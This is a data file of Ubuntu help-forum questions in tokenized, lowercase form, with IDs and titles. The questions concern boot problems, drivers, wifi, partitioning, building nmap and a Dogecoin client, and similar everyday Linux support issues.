393324	trying to issue a command through a launcher	so i am attempting to get a one click minecraft server . i have all the code , and all the programs , but can not for the life of me work out why this wo n't work . so i have a launcher with this as the execute line : exec=gnome-terminal -- command=cd `` /minecraft/server '' & & java -xmx768m -xms768m -jar craftbukkit.jar '' it opens up gnome terminal and gives me this error : there was an error creating the child process for this terminal failed to execute child process `` cd '' ( no such file or directory ) i have tried so many different variables , but none of them seem to work . if you could give me an example to one that will work , and why this is n't working that would be great .
393325	proper method for dictionary installation in ubuntu	i want to install english english dictionary or english malayalam dictionary.is there any method for dictionary installation ? .
393328	dual boot with two hard drives	i have two hard drives , ata and sata , in the sata i have windows 7 , i 'd like to install ubuntu 12.04.3 in the ata . how can i do it ? two need to be primary ? one slave ? i 'd like grub could do a dual boot 'cause i need windows too . thanks .
393330	how set external webcam as a default webcam ?	i have hp 18 aio desktop , which has inbuilt web cam . how can i set an external webcam ( logitech c170 ) as a default cam from command ? is there any way , please help me . cheese webcam booth or other software can do this but i wan to do it on system based so that it will be work on all webcam related software . thanks ! birendra
393332	trouble to access baidu from firefox	i have trouble to go into baidu.com from firefox on my ubuntu 12.04 machine . after i select news , it stuck and the status at bottom says `` waiting for ns0.bdstatic.com '' . why ?
393333	ubuntu harddisk formatting failed	this is the problem i 'm facing . can any one suggest a solution error setting partition type after formatting : error setting partition flags on /dev/sda2 : error spawning command-line `sgdisk -- typecode 2 : '' ebd0a0a2-b9e5-4433-87c0-68b6b72699c7 '' `` /dev/sda '' ' : failed to execute child process `` sgdisk '' ( no such file or directory ) ( g-exec-error-quark , 8 ) ( udisks-error-quark , 0 ) how to fix this ?
393335	problem with setting wallpaper using gsettings	i used gsettings set org.gnome.desktop.background picture-uri 'file : //pathtoimage ' to set an image as a wallpaper as suggested in this answer . this does not do the job properly . for today 's bing image , script here changes my background like this this happens at random and sometimes it sets the wallpaper properly . using gui , setting the image as wallpaper by right-clicking on it works properly every time . any possible causes of this problem ? edit1 : the download is perfectly fine . as i have mentioned , i can set the photo as wallpaper by right clicking the photo and chosing 'set as wallpaper ' from the menu .
393338	booting error on acer aspire v572p-6858	acer aspire 572p-6858 i attempted to install ubuntu 12.04 but have been having issues . i installed using the wubi installer for windows . when i attempt to boot into ubuntu i receive the following error message : '' file : \ubuntu\winboot\wubildr.mbr status : 0x000007b '' i read that i needed to switch from uefi boot to legacy . i also disabled secure boot . once i restarted and booted into legacy my computer shows this : '' intel umdi , pxe-2.1 ( build 003 ) copyright © 1997-200 intel corporation this product is covered by one or more of the following patents us6 , 570 , us6 , 115 , 776m and us6 , 327 , 625 realtek pcie gbe family controller series v2.55a ( 05/24/13 ) pxe-e61 : media test failure , check cable pxe-m0f : existing pxe rom . no bootable device – insert boot disk and press any key '' can someone please help me ?
393339	how to define new swap space since the previous one as a partition has been removed ?	how to define new swap space , which is currently not present on my system at all ? preferably to set on the system partition , not a new one . i do not have swap partition , which has been used only for installation purposes . edit after swap file creation i had a problem with automount it when system starts . solved here .
393340	how can i update to 12.10 safely ?	i am currently running 12.04 lts and would like to update . unfortunately , whenever i do update it does n't boot correctly . on one rare occasion it worked fine , but when i tried to dual-boot another rom it wiped my partitions . the boot gets passed the ubuntu loading then gets stuck at a black screen with only `` _ '' on it at the top left corner . is there something i am doing wrong ?
393344	how to use the terminal with linux 13.10 ?	i would like to know how can i use the terminal ? the functionality of commands . i do n't know how can i use the terminal for download movies or software .
393346	usb storage problem with xubuntu	while i 'm weary of the fact that after i switched to xubuntu from ubuntu , i also got rid of this support , i need help with usb . i primary use linux and mac . i 'm having a problem with a usb becoming read only for reason , and now i ca n't even read on my device from either computer . the only thing i 'm doing is : plugging it in . i have turned off and turned back on the auto-mount option in the settings panel , and that does n't work . to get it to work , i have to format it on anything other than the computer i 'm running xubuntu on , only to plug it back in and have it stop working again . i 'm a good boy though , because i 'm safely ejecting from both . what am i doing wrong ? am i doing anything wrong ? i need help .
393349	beginner in networking please help - file sharing	hello i am new to linux ubuntu , i have a spare pc laying around and i wanted to make it a file/media sharing server . i can not even figure out how to get ubuntu to see my windows 8 pc nor can i get my windows 8 to see my ubuntu . i need step by step instructions on how to set everything up .
393351	how to install windows software in ubuntu ?	ubuntu apt/dpkg package management system , windows .exe file ... but i want windows supported software install in ubuntu os . any tricks there ... how can i do ? i need help ...
393352	ubuntu 13.04 nvidia driver dual monitor	i 'm very new to ubuntu and the first problem i found was the lack of options for dual monitors . my geforce gtx 780 is n't recognizing the second monitor , so after installing the nvidia drivers they did n't show up on my `` additional drivers '' and then subsequently broke unity . after reinstalling 13.04 twice due to different methods of installing the driver ( which still broke unity ) a solution i found was sudo apt-get install nvidia-313-updates followed by sudo nvidia-xconfig . this has n't resulted in anything shown in the `` additional drivers '' tab . i do n't know how to install the nvidia drivers where they wo n't break unity , and where they will enable dual monitors or even show up as drivers .
393357	how to add a mimetype icon in the home directory ?	about the mimetype i have created a mimetype and i want to add an icon for it . the mimetype is for to-do lists , it matches the todo pattern and is of type text/todo . i can confirm that upon creating a file named todo , it shows to be of mimetype text/todo . attempts to add the icon so , i have linked a svg file to ~/.local/share/icons/hicolor/48x48/mimetypes/text-todo.svg hoping that such file will be used as icon for my mimetype . however , it is not . i proceed to run sudo update-icon-caches ~/.local/share/icons/hicolor , which runs quietly , but changes nothing . i then run sudo gtk-update-icon-cache ~/.local/share/icons/hicolor , but i get the message : gtk-update-icon-cache : no theme index file . or gtk-update-icon-cache : the generated cache was invalid . upon running sudo gtk-update-icon-cache -tf ~/.local/share/icons/hicolor . this also , as you 'd expect , changes nothing . so , how do i add an icon for my mimetype in my home directory ?
393358	editing watermarks from docx documents in libreoffice	i got a word docx document from an msoffice user which has a `` draft '' mark as a water mark for pages . this appears as an object in libreoffice named `` powerpluswatermarkobjectxxxx '' . is there any simple way to edit it ( i mean change the text ) ? do i need any kind of plugin there ?
393359	how to open a new terminal with shell prompt and running multiple commands in command line ?	i want to open a new terminal in from within terminal . it should have shell prompt as well as already run few commands . how to do it ?
393362	ethernet port suddenly stopped working in ubuntu 13.04	it is a dell vostro , if that matters . i was uploading files on ftp when it suddenly stopped working . and it wo n't even connect back to the lan . i tried most of of the solutions that were suggested on this tried . ( the setup is a wired connection . the ethernet cable is connected to the port of the router ) i deleted the connection and setup a new one ( sudo dhclient eth0 ) . checked if it is an issue with the ethernet cable ( it was n't ) i reset the router to its default settings to see if it is an issue with corrupted configuration.then i updated the firmware , just in case . i even tried a couple of live os ( centos and ubuntu ) to see if it would fix the issue . but nothing seems to work . at this point , i think it is an issue with hardware . are there any diagnostic tools to see if that is the case ?
393365	why do i have updates for dolphin and konqueror while i 'm using only unity ?	i do n't remember downloading a different desktop management environment ( dm ) , so i 'm using only unity . why do i have updates for dolphin ( a kde file manager ) and konqueror ( a kde web browser ) ? i 'm mean why do i have them installed in the first place ? edit the answers suggest that i may have downloaded tools with kde dependencies . if that 's true , why would this include main applications such as text-editors and web browsers in the updates ? this is the output of some of the suggested commands to investigate : $ dpkg -- get-selections | grep kde kde-baseapps-bin install kde-baseapps-data install kde-l10n-engb install kde-runtime install kde-runtime-data install kdelibs-bin install kdelibs5-data install kdelibs5-plugins install libkde3support4 install libkdeclarative5 install libkdecore5 install libkdesu5 install libkdeui5 install libkdewebkit5 install $ apt-cache rdepends kde < kde >
393366	removing create launcher on panel from context menu	how to remove the context menu entry of create launcher on panel . after installing xfce most of the text files are defaulted to open by create launcher on panel . how to remove that entry . what is the name of that application.. thanks
393370	help installing nmap 6.40 on 12.04	im trying to install i tried following the instructions in the nmap site by doing this : bzip2 -cd nmap-6.40.tar.bz2 | tar xvf - cd nmap-6.40 ./configure make su root make install and it all works well untill i type in make and i seem to get something that is an error /nmap-6.40 $ make compiling liblua make [ 1 ] : entering directory `/home/qayin/nmap-6.40/liblua' make [ 1 ] : `liblua.a ' is up to date . make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/liblua' compiling liblinear make [ 1 ] : entering directory `/home/qayin/nmap-6.40/liblinear' make [ 1 ] : `liblinear.a ' is up to date . make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/liblinear' compiling libpcap make [ 1 ] : entering directory `/home/qayin/nmap-6.40/libpcap' ver=`cat ./version` ; \ major_ver=`sed 's/\ ( [ 0-9 ] [ 0-9 ] *\ ) \..*/\1/ ' ./version` ; \ gcc -shared -wl , -soname , libpcap.so. $ major_ver \ -o libpcap.so. $ ver pcap-linux.o pcap-usb-linux.o pcap-can-linux.o pcap-netfilter-linux.o fad-getad.o pcap.o inet.o gencode.o optimize.o nametoaddr.o etherent.o savefile.o sf-pcap.o sf-pcap-ng.o pcap-common.o bpf_image.o bpf_dump.o scanner.o grammar.o bpf_filter.o version.o /usr/bin/ld : can not open output file libpcap.so.1.2.1 : permission denied collect2 : ld returned 1 exit status make [ 1 ] : *** [ libpcap.so ] error 1 make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/libpcap' make : *** [ pcap_build ] error 2 qayin @ kraken-pc : ~/nmap-6.40 $ sudo make compiling liblua make [ 1 ] : entering directory `/home/qayin/nmap-6.40/liblua' make [ 1 ] : `liblua.a ' is up to date . make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/liblua' compiling liblinear make [ 1 ] : entering directory `/home/qayin/nmap-6.40/liblinear' make [ 1 ] : `liblinear.a ' is up to date . make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/liblinear' compiling libpcap make [ 1 ] : entering directory `/home/qayin/nmap-6.40/libpcap' ver=`cat ./version` ; \ major_ver=`sed 's/\ ( [ 0-9 ] [ 0-9 ] *\ ) \..*/\1/ ' ./version` ; \ gcc -shared -wl , -soname , libpcap.so. $ major_ver \ -o libpcap.so. $ ver pcap-linux.o pcap-usb-linux.o pcap-can-linux.o pcap-netfilter-linux.o fad-getad.o pcap.o inet.o gencode.o optimize.o nametoaddr.o etherent.o savefile.o sf-pcap.o sf-pcap-ng.o pcap-common.o bpf_image.o bpf_dump.o scanner.o grammar.o bpf_filter.o version.o ./config.status -- file=pcap-config.tmp : ./pcap-config.in config.status : creating pcap-config.tmp mv pcap-config.tmp pcap-config chmod a+x pcap-config make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/libpcap' compiling libpcre make [ 1 ] : entering directory `/home/qayin/nmap-6.40/libpcre' make all-am make [ 2 ] : entering directory `/home/qayin/nmap-6.40/libpcre' make [ 2 ] : leaving directory `/home/qayin/nmap-6.40/libpcre' make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/libpcre' compiling libdnet make [ 1 ] : entering directory `/home/qayin/nmap-6.40/libdnet-stripped' making all in include make [ 2 ] : entering directory `/home/qayin/nmap-6.40/libdnet-stripped/include' make all-recursive make [ 3 ] : entering directory `/home/qayin/nmap-6.40/libdnet-stripped/include' making all in dnet make [ 4 ] : entering directory `/home/qayin/nmap-6.40/libdnet-stripped/include/dnet' make [ 4 ] : nothing to be done for `all ' . make [ 4 ] : leaving directory `/home/qayin/nmap-6.40/libdnet-stripped/include/dnet' make [ 4 ] : entering directory `/home/qayin/nmap-6.40/libdnet-stripped/include' make [ 4 ] : leaving directory `/home/qayin/nmap-6.40/libdnet-stripped/include' make [ 3 ] : leaving directory `/home/qayin/nmap-6.40/libdnet-stripped/include' make [ 2 ] : leaving directory `/home/qayin/nmap-6.40/libdnet-stripped/include' making all in src make [ 2 ] : entering directory `/home/qayin/nmap-6.40/libdnet-stripped/src' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/qayin/nmap-6.40/libdnet-stripped/src' make [ 2 ] : entering directory `/home/qayin/nmap-6.40/libdnet-stripped' make [ 2 ] : nothing to be done for `all-am ' . make [ 2 ] : leaving directory `/home/qayin/nmap-6.40/libdnet-stripped' make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/libdnet-stripped' compiling libnbase cd nbase & & make make [ 1 ] : entering directory `/home/qayin/nmap-6.40/nbase' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/nbase' compiling libnsock cd nsock/src & & make make [ 1 ] : entering directory `/home/qayin/nmap-6.40/nsock/src' cd ../../nbase & & make make [ 2 ] : entering directory `/home/qayin/nmap-6.40/nbase' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/qayin/nmap-6.40/nbase' make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/nsock/src' cd ncat & & make make [ 1 ] : entering directory `/home/qayin/nmap-6.40/ncat' compiling liblua make [ 2 ] : entering directory `/home/qayin/nmap-6.40/liblua' make [ 2 ] : `liblua.a ' is up to date . make [ 2 ] : leaving directory `/home/qayin/nmap-6.40/liblua' compiling libnsock cd ../nsock/src & & make make [ 2 ] : entering directory `/home/qayin/nmap-6.40/nsock/src' cd ../../nbase & & make make [ 3 ] : entering directory `/home/qayin/nmap-6.40/nbase' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/qayin/nmap-6.40/nbase' make [ 2 ] : leaving directory `/home/qayin/nmap-6.40/nsock/src' gcc -o test/addrset -g -o2 -wall -l../libpcap test/addrset.o ncat_core.o sys_wrap.o util.o ncat_lua.o -ldl -ldl ../nsock/src/libnsock.a ../nbase/libnbase.a -lpcap ./../liblua/liblua.a -lm ./../liblua/liblua.a ( loadlib.o ) : in function `ll_sym ' : /home/qayin/nmap-6.40/liblua/loadlib.c:142 : undefined reference to `dlsym' ./../liblua/liblua.a ( loadlib.o ) : in function `ll_load ' : /home/qayin/nmap-6.40/liblua/loadlib.c:135 : undefined reference to `dlopen' ./../liblua/liblua.a ( loadlib.o ) : in function `ll_sym ' : /home/qayin/nmap-6.40/liblua/loadlib.c:143 : undefined reference to `dlerror' ./../liblua/liblua.a ( loadlib.o ) : in function `ll_load ' : /home/qayin/nmap-6.40/liblua/loadlib.c:136 : undefined reference to `dlerror' ./../liblua/liblua.a ( loadlib.o ) : in function `ll_unloadlib ' : /home/qayin/nmap-6.40/liblua/loadlib.c:130 : undefined reference to `dlclose' collect2 : ld returned 1 exit status make [ 1 ] : *** [ test/addrset ] error 1 make [ 1 ] : leaving directory `/home/qayin/nmap-6.40/ncat' make : *** [ ncat_build ] error 2 anyhow i try to continue and su root and i get authentication failure for some reason , so i did sudo su instead , and then it says im root but make install does not work , giving me the replay : make : *** no rule to make targetlibnetutil/libnetutil.a ' , needed by nmap stop . ty
393371	juju gui problem with login	hello i have installed maas and juju , now that i want to login juju 's gui there is user and password user-admin password i have tried the password from my environments.yaml but no success . i use the ip address of the node to login https : //'192.168.50.103'/login , but i ca n't the address of the maas server is 192.168.50.101/maas . is the username user-admin wrong ? any advices ?
393376	/etc/fstab question about dump	in /etc/fstab if the fifth field is set to 1 , meaning the partition need to be backedup via dump , my question if it is 1 , which location dump will backup the partition to ? i run dump -w found the partition ( set to 1 ) never be backuped by dump , why ? anything else i need to config to make dump in /etc/fstab work ?
393377	-lintl missing while building sesc utils	i am getting an error of can not find -lintl while building the build-1-binutils with gcc 3.4.5 during installation of sesc utils on ubuntu ( 12.04 ) . can anyone help me plz ?
393378	setup norton dns in ubuntu 12.04	i want to setup norton dns for my ubuntu 12.04 for all network connections ? how can i setup the dns servers ? the dns are : preferred dns : 199.85.126.20 alternate dns : 199.85.127.20
393380	black screen after grub on 1. installaion , but sound still there	i just bought an asus ux302lg with hope that i could install ubuntu on it . i disabled the secure boot in order to eliminate any problems in that direction . when i boot the machine , i reach the grub loader asking me if i want to try , install or check disk . if i select the `` try now '' , the screen goes black after 2 sec . and nothing then happens . is there anything else i should do in order for ubuntu to be installed alongside windows 8 ? i have tried turning fastboot off , disabling secure boot , and enabling legacy bios/scm . i 've managed to get a live cd with linux mint running in rendering mode , so i belive that this is a video card problem .
393381	trying to overwrite '/usr/bin/inspect ' , which is also in package libboost1.53-tools-dev 1.53.0-6+exp3ubuntu8	this is the output after sudo apt-get -f install the following packages will be upgraded : libboost1.49-dev 1 upgraded , 0 newly installed , 0 to remove and 57 not upgraded . 21 not fully installed or removed . need to get 0 b/9,182 kb of archives . after this operation , 24.6 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 580974 files and directories currently installed . ) preparing to replace libboost1.49-dev 1.49.0-3.2ubuntu1 ( using ... /libboost1.49-dev_1.49.0-4_i386.deb ) ... unpacking replacement libboost1.49-dev ... dpkg : error processing /var/cache/apt/archives/libboost1.49-dev_1.49.0-4_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/inspect ' , which is also in package libboost1.53-tools-dev 1.53.0-6+exp3ubuntu8 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libboost1.49-dev_1.49.0-4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
393383	how long can my data stay on ubuntu one	how long can my data stay on ubuntu one ? even if i do not use them ? could happend to me , that i do not use my data for a long time , that i lose them ? thanks for answer !
393384	can i use ubuntu 12.04 installed pc like a hosting server for develelopment testing ?	please note that i already have lamp stack and able to run php script in this system . read the question carefully before answering or marking as duplicate ... ... ... i am a novice user in server related things and have keen interest in linux . so , i installed ununtu 12.04 desktop with 32 bit version in my pc . i connected this system with internet . i also have another system in which windows xp 32 bit is installed . now , i am developing a php / mysql based application in my windows system . for development testing , i want to host my application using ftp software on ubuntu system just like we usually do on hosting servers . is it possible ? if yes , then how can i achieve this ? also , can i access my application through ip address of my ubuntu system ? how mysql will be connected by the script hosted ? many thanks ...
393385	how to connect vodafone k3800 dongle in ubuntu 12.04	i have tried to connect vodafone k3800 dongle but it can not be connected even when dongle indicating green light ( it means grrs is connected ) .. help please ! ! i am new to ubuntu
393386	dogecoin wallet client dependencies ( boost )	i seem to be missing something boost related . dogecoin gives the requirements as : qt4-qmake libqt4-dev build-essential libboost-dev libboost-system-dev libboost-filesystem-dev libboost-program-options-dev libboost-thread-dev libssl-dev libdb++-dev libminiupnpc-dev https : //github.com/dogecoin/dogecoin/blob/master/doc/readme-qt.rst compile error : s/db/build_unix -ic : /deps/ssl/include -ibuild -ibuild -o build/net.o src/net.cpp src/main.cpp:17:53 : fatal error : boost/random/uniform_int_distribution.hpp : no such file or directory compilation terminated . make : *** [ build/main.o ] error 1 make : *** waiting for unfinished jobs ... . thufir @ dur : ~/dogecoin $ thufir @ dur : ~/dogecoin $ apt-cache search libboost1.53-all-dev thufir @ dur : ~/dogecoin $ thufir @ dur : ~/dogecoin $ sudo apt-get install libboost-all-dev reading package lists ... done building dependency tree reading state information ... done libboost-all-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . thufir @ dur : ~/dogecoin $ see also : http : //b.agilob.net/such-address-many-dig-on-linux-wow/
393390	apt get is not working	i dont have a proxy problem . madhu @ lifempire : ~ $ sudo apt-get install codeblocks reading package lists ... done madhu @ lifempire : ~ $ tree ... 0 % here is the output for sudo apt-get install -f madhu @ lifempire : ~ $ sudo apt-get install -f reading package lists ... done madhu @ lifempire : ~ $ tree ... 0 % this is wierd . until yesterday it worked fine .
393395	two password prompts after fadeout	i 'm working on ubuntu 13.04 with gnome shell . i already had some issues affecting my desktop background in unity on the same installation and could not solve it : unity desktop `` smears '' ( does n't refresh ) and shows no wallpaper whenever i leave my computer for a while , the fades to dark and gets locked ( as expected ) . when i try to unlock it , i see a password prompt with a wallpaper as background i once set some time ago . once i 've typed my password and hit enter , a second prompt appears with a different background wallpaper ( another one i had set sometime somewhere ) . after entering the same password there , i finally reach my unlocked desktop , but the background is gray again . my guess is that there are somehow two different programs trying to manage my session ( login , wallpaper , ... ) and disturb each other . how can i get to the bottom of this ?
393400	is it possible to have two different dpi configurations for two different screens ?	i 'm using ubuntu 12.04.3 with nvidia drivers ( 319 ) for my quadro k2100m graphic card , and when i switch my main 3200x1800 laptop screen to mode 1920x1080 ( using nvidia-settings ) , the display goes blurry ... i am using two screens : my main screen is a lcd with max resolution 1920x1200 . my laptop screen ( original resolution 3200x1800 ) is sitting to the right of that . the main problem is that , on ubuntu , the font is far too small on my laptop screen . because of that , i wanted to change the resolution of my laptop to 1920x1080 . reading galgalesh answer i tryed to compute my dpi and here is the dpi configuration which i should have : 94x94 for my main lcd screen 1920x1200 235x236 for my 3200x1800 laptop screen is there a way to have dual dpi resolutions with an extended desktop ?
393402	how to download and install ubuntu in andriod phones ?	i am using sony erricson xperia ray mobile phone . i heard that ubuntu is available for smart phones . is it possible to install ubuntu in my phone ? i am very eager to try ubuntu in my phone . if it is possible where could i downald and install in my smartphone .
393406	installing metatrader 4 ?	can someone tell me what i need to do ... i downloaded metatrader4 setup.exe onto my computer with a new harddrive and new install of ubuntu . i have downloaded wine , and 7zip ... i right clicked the setup file ... selected `` open with wine windows program loader '' ... it looks like its going to open and then it closes the icon on the launcher that had appeared as it went to open ... what are the settings i need to change ? how do i get to `` software sources ? i am new to linux and new to ubuntu ... so please do n't assume anything ... i am an idiot ... lol
393412	ca n't control the brightness on ununtu 13.10	i have ubuntu 13.10 in my dell inspiron 3521 with intel core i5 and graphics of intel ivibridge mobile . i can adjust the brightness of the screen . all the solutions that i found was to try to change the grub file as suggested in how do i get the brightness control working on a lenovo yoga 13 ? but i get my screen stop running when the screen get dimmed . btw i have 2 lines in my grub file : grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' i tried to change each one of them ( and both ) with no luck . any suggestions ?
393415	task scheduler in system settings does not appear	i install kde 's task scheduler to be able to access to crontab via gui . after install , i try to open this soft , however , i can not find where it is . i follow this demo on youtube , and i note that i can access on it via system settings however , when i open this interface , i do n't find task scheduler in menu , see the following screen shot .
393418	unsafe swap space detected	so i had a ubuntu 13.04 installation and i had encrypted my hard drive while i was doing installation . i was playing around and mistakenly deleted all the partitions , now i downloaded lubuntu 13.10 x86 desktop but when i am trying to install it says `` unsafe swap space detected '' i am clueless on how to fix this error .
393423	ubuntu 12.1-unable to mount location	there are two hdd ( sda and sdb ) on my computer . i installed ubuntu 12.1 on `` sda '' . and i mounted to /home `` sdb '' . desktop -- > above menu bar -- > go -- > computer -- > 2.0 tb hard disk ( sdb ) -- > unable to mount location . i want to access `` 2.0 tb hard disk ( sdb ) '' from there ( go -- > computer ) . how can i mount it ? physics @ physics : ~ $ sudo mount /dev/sdb5 mount : /dev/sdb5 already mounted or /home busy mount : according to mtab , /dev/sdb5 is already mounted on /home i typed fdisk -l on terminal : disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000072a0 device boot start end blocks id system /dev/sda1 * 2048 480585727 240291840 83 linux /dev/sda2 480587774 500117503 9764865 5 extended /dev/sda5 480587776 500117503 9764864 82 linux swap / solaris disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0001ca53 device boot start end blocks id system /dev/sdb1 2046 3907028991 1953513473 5 extended partition 1 does not start on physical sector boundary . /dev/sdb5 2048 3907028991 1953513472 83 linux
393427	network manager hardswitch on	my friend has recently bought an asus x551c with and ar9485 qualcomm atheros wireless card . i installed on this machine ubuntu 13.10 . now the problem is : when i turn on the machine for the first time the network manager reports that the card is disabled by hardware switch ( note that on this machine there 's no physical hardware switch ) . when i suspend the machine and turn it back on the wifi works fine . the same exact thing happens to the usb huawei broadband stick ( e173s ) . this is what lshw spits out lshw -class network *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : a4 : db:30:7a:87:55 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-15-generic firmware=n/a ip=192.168.1.233 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7d00000-f7d7ffff memory : f7d80000-f7d8ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:03:00.2 logical name : eth0 version : 06 serial : bc : ee:7b:4d:6b : ea size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8402-1_0.0.1 10/26/11 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff can you help me with this ?
393431	dolfin vtk plot : black cells	i am using ubuntu 13.10 and i am working with development version of dolfin 1.2.0+ . when i plot some function i get these black cells which are not part of the data : i try exporting the data to .pvd and plot it using paraview and i get the same error the plotting in dolfin is done through the vtkplot : 'vtkplotter ' and i was wondering if there is a way to turn this off and just plot the data without the black cells .
393433	best way to partition ubuntu 12.04 alongside with windows 7 on 1 terra hd . ( with priority for ubuntu )	i have a new laptop without os . i want to install windows 7 ( and give it a small space ) just in case i need it for a specific software or game . in parallel i 'm a ubuntu user so i want to give it the biggest space on the hard disk . what is the perfect scenario to do that ? do i need to create c : / and d : / on windows ? if i have 8 gb of ram how much the swap of ubuntu should be ? do i create the /home during installation of ubuntu ? help .
393438	ubuntu 12.04 doesn t boot after automatic upgrades were installed	i have been using ubuntu for a month and until now there were no problems . after i ran the automatic updates last night , today ubuntu can no longer boot , even with ctrl+alt+f1 . i ca n't boot to run commands . tried everything from recovery console , i entered command shell from recovery console ( i think that is the right term ) to try and add these commands i found on the ubuntu help forums regarding nvidia drivers : sudo apt-get purge nvidia-304 and sudo apt-get nvidia current , but it does n't recognize these commands . so basically after starting computer all i see is a line that keeps blinking and nothing works .
393442	how can i change language of ubuntu 12.04 from english to marathi	i did a fresh install of ubuntu 12.04 in english language and then tried to change the language to marathi from the settings window . i did the apply system wide but it still wo n't work . i have also updated the system and installed the marathi keyboard but it does n't work . how can i change the language to marathi .
393443	( root or admin ) username and password in roundcube	i installed roundcube on my ubuntu server. , for the first time . â i do not know the root or admin username and pass to login . but i 'm login with my gmail account . please do not laugh at me . and help me . thanks .
393444	how to change cursor in wine ?	my current cursor in wine is human ( ubuntu ) , and i want to change it to adwaita , so how to do that ? it seems crazy when i see the cursor changes when i switch to wine . sorry i 'm newbie in this asking forum . wine : 1.4.1 gnome : 3.10 ubuntu : 13.10 saucy salamander [ final ]
393445	wifi keeps disconnecting on 13.10	upgraded ubuntu to 13.10 , i am using a realtek wifi card on a minipc . the wifi connection goes slower than it should : speedtest gives me a 15mb/s download when on my phone it gets around 30 and the connection keeps dropping ( signal level goes from 4 to 0 and i am asked wifi passw again and again ) . this is the output of lsmod | grep rtl rtl8192ce 137725 0 rtlwifi 110108 1 rtl8192ce mac80211 596969 2 rtlwifi , rtl8192ce cfg80211 479757 2 mac80211 , rtlwifi if i run iwconfig i get wlan0 ieee 802.11bgn essid : '' mynetwork '' mode : managed frequency:2.412 ghz access point : a4 : b1 : e9:6c : b0 : b3 bit rate=65 mb/s tx-power=33 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=46/70 signal level=-64 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:4 missed beacon:0 any ideas ?
393446	difference between the host and the guest os kernel versions	i had installed ubuntu 12.04 64-bit on my laptop ( host os ) when it was released ( around april , 2012 ) and after applying all the patches ( sudo apt-get update ; sudo apt-get dist-upgrade ) , the version of linux kernel is uname -r 3.2.0-53-generic recently i downloaded ubuntu-12.04.3-desktop-amd64.iso and used if for installing a guest os on top of virtualbox , the default linux kernel is uname -r 3.8.0-29-generic and 3.8.0-34 is available on doing a dist-upgrade on the guest . why is not the kernel version getting upgraded to 3.8.0-* on the host os even after a dist-upgrade ? i am getting the rest of the upgrades though . also , because of the kernel mismatch i am not able to install the virtualbox guest additions .
393450	how to remove duplicate application in /usr/share/applications folder ?	i just started using xfce and i 'm loving it so far but i 've yet to figure this out . i 'm having trouble removing a duplicate google chrome file in this folder . the main thing is i want to remove it from my menu since i have one under the internet sub-folder in the menu and also one under other . i 'm ocd so this is driving me insane . in the applications folder , the only thing that differentiates the two is that the duplicate just has the command entry ( as `` google-chrome '' filled under properties while the other has a description and comment which is the one i want to keep . i do n't know how to remove the duplicate since the rm command says it ca n't find that directory ( and i 'm not sure how to word it exactly since they are both named the same ) . i tried the fix of the `` nodisplay=true '' but i 'm not sure how to differentiate between the two since they both have the same name . i also tried changing the duplicate to renaming it to the desktop.old extension but it said that it does n't exist . i 'm ok with uninstalling and installing again if i can be absolutely sure it removes both . edit : sorry for the late response and thanks for those who responded . i should have clarified better , i 'm currently using the crouton installation of ubuntu on an acer c720 . i have just removed google chrome but this second application in the /usr/share/applications folder is still there , although its grey and does n't launch anything since it 's uninstalled . i tried this way ( how to remove single file from /usr directory ? ) by using the command but , the file name is google chrome ( and i 've tried google-chrome , google-chrome.desktop ) and i ca n't remove it by command because it does n't recognize the space , so it looks for google and chrome separately and it says no such file or directory for both ( including google-chrome and google-chrome.desktop ) . anyone have any ideas of getting rid of this thing ?
